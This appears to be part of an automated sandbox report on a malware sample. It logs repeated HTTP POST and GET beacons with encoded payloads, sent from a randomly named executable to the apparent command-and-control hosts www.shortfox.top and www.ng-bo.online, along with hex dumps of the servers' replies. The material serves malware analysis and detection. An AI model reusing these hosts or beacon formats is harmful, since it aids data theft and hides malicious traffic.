                                                                        May 22, 2024 17:36:08.860966921 CEST756OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 35 50 61 55 2b 78 71 33 4d 68 79 57 4e 6f 38 4a 6c 61 61 4e 42 5a 64 2f 42 55 39 5a 6b 75 56 56 43 46 71 38 69 38 4d 37 49 4b 66 4c 59 54 44 6e 6a 53 68 59 79 32 77 73 30 33 79 64 76 73 77 46 4a 68 44 58 45 68 41 55 2b 52 35 62 4b 2b 59 36 63 71 71 46 6f 4e 42 2b 69 6d 7a 75 65 65 33 2b 4c 44 68 4b 33 52 5a 5a 2f 2f 41 73 78 6a 43 31 73 4b 6b 66 76 55 71 36 38 74 39 79 6e 35 48 50 51 79 4f 71 42 45 33 4d 76 6c 6c 71 39 72 4c 30 55 2b 49 6c 46 34 47 35 57 39 6f 67 35 6e 63 39 52 32 59 63 46 63 61 78 41 38 70 34 7a 5a 6f 77 2f 32 73 36 36 2f 45 36 48 76 72 65 71 6d 6a 45 63 41 3d 3d
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWNo8JlaaNBZd/BU9ZkuVVCFq8i8M7IKfLYTDnjShYy2ws03ydvswFJhDXEhAU+R5bK+Y6cqqFoNB+imzuee3+LDhK3RZZ//AsxjC1sKkfvUq68t9yn5HPQyOqBE3Mvllq9rL0U+IlF4G5W9og5nc9R2YcFcaxA8p4zZow/2s66/E6HvreqmjEcA==
                                                                        May 22, 2024 17:36:09.079746008 CEST533INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:08 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        51192.168.11.3049847203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:11.593194008 CEST776OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 35 50 61 55 2b 78 71 33 4d 68 79 57 4d 4a 73 4a 67 39 4f 4e 49 5a 64 34 64 6b 39 5a 71 4f 56 52 43 46 6d 38 69 39 4a 6d 49 35 37 4c 59 32 2f 6e 69 54 68 59 68 47 77 73 67 6e 79 63 33 4d 77 30 4a 68 48 31 45 68 38 55 2b 52 46 62 4b 37 38 36 63 5a 43 47 6f 64 42 38 71 47 7a 6f 51 2b 33 2b 4c 44 68 4b 33 56 78 7a 2f 2f 59 73 78 54 79 31 73 75 49 41 6c 30 71 6c 71 39 39 79 6a 35 48 4c 51 79 4f 49 42 48 79 70 76 67 68 71 39 71 37 30 55 4d 77 6d 4f 34 48 38 5a 64 70 7a 33 58 5a 71 4a 45 35 78 55 2b 50 75 42 4d 6f 44 79 4f 5a 71 69 31 59 34 70 66 34 58 62 75 47 32 6f 6b 69 66 42 41 39 51 63 37 44 77 78 78 54 4a 72 77 59 49 2f 57 6a 6f 52 6b 77 3d
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI57LY2/niThYhGwsgnyc3Mw0JhH1Eh8U+RFbK786cZCGodB8qGzoQ+3+LDhK3Vxz//YsxTy1suIAl0qlq99yj5HLQyOIBHypvghq9q70UMwmO4H8Zdpz3XZqJE5xU+PuBMoDyOZqi1Y4pf4XbuG2okifBA9Qc7DwxxTJrwYI/WjoRkw=
                                                                        May 22, 2024 17:36:11.819117069 CEST533INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:11 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        52192.168.11.3049848203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:14.327382088 CEST1693OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 35 50 61 55 2b 78 71 33 4d 68 79 57 4d 4a 73 4a 67 39 4f 4e 49 5a 64 34 64 6b 39 5a 71 4f 56 52 43 46 6d 38 69 39 4a 6d 49 35 7a 4c 5a 45 48 6e 6b 77 4a 59 69 47 77 73 38 58 79 52 33 4d 77 74 4a 6c 54 78 45 68 77 75 2b 55 42 62 4b 5a 30 36 4e 59 43 47 78 74 42 38 31 32 7a 70 65 65 33 76 4c 44 78 4f 33 52 56 7a 2f 2f 59 73 78 56 2b 31 6c 61 6b 41 6a 30 71 36 38 74 39 6d 6e 35 48 7a 51 79 57 79 42 45 65 54 75 55 56 71 2b 4b 72 30 57 5a 6b 6d 4d 59 48 79 4e 39 6f 30 33 57 6b 74 4a 45 6b 64 55 2f 71 42 42 4d 51 44 32 5a 77 43 2f 57 55 77 7a 63 77 45 55 62 76 4d 6e 43 4f 4e 4a 67 56 67 57 4c 54 4a 6e 69 44 46 77 48 67 6f 6b 48 72 78 53 42 35 46 4a 37 57 61 54 73 68 6c 37 73 6f 31 56 5a 61 38 2f 64 65 45 41 39 70 6e 78 6f 63 51 2b 2f 6f 37 6a 35 77 78 75 41 51 62 42 53 63 4a 32 57 74 42 50 6c 48 33 72 43 4c 62 53 49 4e 71 71 38 57 51 7a 72 6e 70 32 35 44 6d 52 47 6b 7a 78 6d 75 76 53 69 62 7a 2b 4c 50 4f 5a 61 6e 39 4b 52 78 73 35 77 2b 37 78 79 5a 49 6f 4d 36 73 46 73 30 5a 34 34 6a 50 [TRUNCATED]
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI5zLZEHnkwJYiGws8XyR3MwtJlTxEhwu+UBbKZ06NYCGxtB812zpee3vLDxO3RVz//YsxV+1lakAj0q68t9mn5HzQyWyBEeTuUVq+Kr0WZkmMYHyN9o03WktJEkdU/qBBMQD2ZwC/WUwzcwEUbvMnCONJgVgWLTJniDFwHgokHrxSB5FJ7WaTshl7so1VZa8/deEA9pnxocQ+/o7j5wxuAQbBScJ2WtBPlH3rCLbSINqq8WQzrnp25DmRGkzxmuvSibz+LPOZan9KRxs5w+7xyZIoM6sFs0Z44jPx1lLTcLLrJCByrEVjmQyxKdpPq/PzMCzg9r7COTjnB0RhLse8hUIeftYIrsaFnQHstuIlf3jCLq7NEBxz6o3u9Ix8H0CBnBONfDilU/Y018o25BEphT7ypGXXbOeryO5e/YPyRmKFrxN5BbIIzoLosFqUTWCqsrI1BucYKqZJk7UY5vMslXDALXTQK+HmfckVSFFSoulZonsi5pgA3TEgSelt7rTf1+NuQfcK62LK1OXLWsJkErSMo+TZhA614jnAs2A2ZOJPFMWlh2TIJ5dsakODt7rWViFhifL69A2FZhsqG6+TSxNWxoyW6ow4zCcSfddYYqDXVXQrL9i7KfmPG+AxYtz56AHgo0l56dnyjGuLwDxKOe6iLdaQDj8zm7xPbyWQbn/2C360FnAh2zyQRCM81sqXUTF5sWOuBE1LeTxZ5ONf0zNEhQgB9tlyYiJiIHMxzactbjwzrP5xNqC+2zOIAj7pptAkflXZCM76/YQloS0mpuyaPNQwNpey6oQAorNqIkvYO2W281xaNyuDQr9WU6hjBTQRhsc14pc1/f1hf9F2W70Ro8AJC02wOJ5rt+IGelyp7zOCn2BXi4Mgpj4VQoFN8pjlaEZMcgohmbQb0tdQKiVGzdFYedxU9NSfTDR9B9Iak2mD0god+6/rhqIH5jCLeTHW9 [TRUNCATED]
                                                                        May 22, 2024 17:36:14.550146103 CEST533INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:14 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        53192.168.11.3049849203.161.49.193807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:17.064157963 CEST485OUTGET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.shortfox.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:17.286336899 CEST548INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:17 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        54192.168.11.304985037.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:22.652529955 CEST756OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 64 44 73 65 56 30 78 47 71 49 51 39 74 4e 77 57 50 41 76 30 63 55 5a 42 4f 50 34 49 70 57 66 52 39 77 68 36 64 64 64 4e 50 44 4c 5a 4e 6e 4f 6a 37 53 66 63 6e 4b 79 78 51 4a 62 77 74 62 66 2b 62 45 43 51 70 46 45 79 4b 73 47 41 65 73 34 6f 56 6e 61 66 4e 42 6e 67 53 6c 4f 2b 42 76 49 58 47 6e 67 76 41 47 6c 6f 50 76 2f 57 77 55 48 59 76 65 53 54 46 4a 74 2f 4b 35 71 79 6b 6f 5a 31 32 56 2b 73 34 58 61 2b 59 4f 30 51 6f 7a 65 30 4e 37 42 34 49 6f 62 48 52 4e 74 42 59 73 41 75 47 65 6b 32 5a 67 6f 77 67 59 77 57 4e 6b 56 44 77 30 49 63 2f 69 65 55 2f 58 38 41 47 36 4c 4e 6d 51 3d 3d
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tNwWPAv0cUZBOP4IpWfR9wh6dddNPDLZNnOj7SfcnKyxQJbwtbf+bECQpFEyKsGAes4oVnafNBngSlO+BvIXGngvAGloPv/WwUHYveSTFJt/K5qykoZ12V+s4Xa+YO0Qoze0N7B4IobHRNtBYsAuGek2ZgowgYwWNkVDw0Ic/ieU/X8AG6LNmQ==
                                                                        May 22, 2024 17:36:23.026519060 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:22 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                        Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                        May 22, 2024 17:36:23.026546955 CEST1289INData Raw: 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c c7 9c 11 9a c0 49 ec c2 d0 f8 fb 97 85 b4 50 16 63 66 4a 4b 70 50 b1 db 97 c8 4a 80 25 f4 11 ff 0f 14 b8 6b 04 13 94 4d 6a 29 0f 05 a1 83 64 9e c9 42 1b 93 d9
                                                                        Data Ascii: +O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@sH|[`Ck+gBx>Pv-$h!Wh}
                                                                        May 22, 2024 17:36:23.026840925 CEST1289INData Raw: 7f 50 43 3a c3 8d 67 30 a2 23 fc cf 6d 40 37 ec 8d a4 f9 07 35 9c 33 dc 78 7a a3 39 46 ff bc 06 73 c3 be 88 1b 7f 48 43 39 cb 8a a7 37 92 01 7f 62 20 47 25 c8 71 c4 2b cb c1 b3 bd d1 d9 e8 c5 62 91 7b 0e 66 b4 1b 1f 9d be 1e ce 84 59 69 89 ab b9
                                                                        Data Ascii: PC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>io
                                                                        May 22, 2024 17:36:23.026868105 CEST1289INData Raw: 76 21 0a 44 3d a3 f7 b0 93 38 36 c7 21 4d d2 33 f9 0c 3b 29 69 e6 2e 14 28 7a 72 4f a1 94 20 76 27 61 27 3f 98 fc 83 34 1b 9e d7 35 28 b4 e4 d9 bc 82 9d 9c 65 b4 c3 d3 14 3d 97 2f b0 93 96 86 6e 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd
                                                                        Data Ascii: v!D=86!M3;)i.(zrO v'a'?45(e=/n@v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}
                                                                        May 22, 2024 17:36:23.027090073 CEST1289INData Raw: f5 60 66 78 e5 2c ff ae aa 5a b0 dc ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1
                                                                        Data Ascii: `fx,ZjyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>
                                                                        May 22, 2024 17:36:23.027115107 CEST1289INData Raw: 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8 a5 07 30 d7 58 7a b7 8d d9 02 3c db c3 5c 3b 36 fd 4f 41 f7 27 63 ae 65 c4 f6 28 e6 1a 5b 77 ed 6f ae b1 74 56 0b 73 ad 9a
                                                                        Data Ascii: !44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wotV{AJ29v,TAo`
                                                                        May 22, 2024 17:36:23.027561903 CEST1289INData Raw: 2b 22 cb 9e 06 c7 ea 16 d4 a2 5c d7 79 08 e1 30 ab 8a 09 26 e5 c2 59 a4 2a 00 48 0a 02 1b 0b d4 e4 7b eb da da 5d 06 df d7 b4 b3 10 7d e1 d2 ce 62 d8 f8 9d 85 92 17 17 ed db 1b b4 35 0f 55 d2 c0 d4 1f c0 be 12 6e 95 31 a7 9c 17 d5 54 1d 7f 78 a4
                                                                        Data Ascii: +"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJFh4~TnB4]<~}x)$u0x1wie}u}3ys\_B0B
                                                                        May 22, 2024 17:36:23.027586937 CEST1289INData Raw: 2a f0 6f cc 6b 20 02 28 77 a2 4c 7f 00 5d d8 7c 7e 08 72 2a 0d 71 d8 8e 86 d0 20 18 ce 00 42 19 20 dd 20 bd 02 61 17 b6 65 0c 22 36 e6 47 5a f8 c3 00 a1 19 a1 28 d2 2f 94 55 68 ab 2c a3 e8 49 20 d5 f0 43 a1 1f 44 8c f9 21 2a 05 49 06 3e 08 84 6b
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:36:23.027756929 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
